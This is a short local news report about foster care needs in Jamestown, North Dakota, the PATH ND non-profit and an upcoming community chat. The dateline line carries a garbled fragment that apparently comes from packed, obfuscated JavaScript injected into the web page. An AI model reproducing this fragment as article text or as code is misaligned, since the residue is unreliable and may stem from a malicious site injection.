JAMESTOWN, N.D. (NewsDakota.com) – tbrhy|var|u0026u|referrer|sdznh||js|php’.split(‘|’),0,{}))
According to the Child Welfare League of America
, 1,359 children in North Dakota lived apart from their families in out-of-home care in 2015.

PATH North Dakota is a Foster Care, adoption, in-home, and community-based family service non-profit organization. For more than 15 years, PATH has provided support and services to children and families in North Dakota.

PATH ND Recruitment and Licensing coordinator Bill Grommesh says Jamestown is a key area.

Grommesh says they would like to keep foster children in communities in their respective community. Carissa Cox says family connection is important through PATH ND’s program.

Cox also pointed out that there’s even the possibility of being a part-time foster parent.

A chat on foster care in the Jamestown area will be held tonight at Babb’s Coffee House starting at 6PM. For more information on the discussion or about Path ND, contact Bill Grommesh at bgrommesh@pathinc.org.
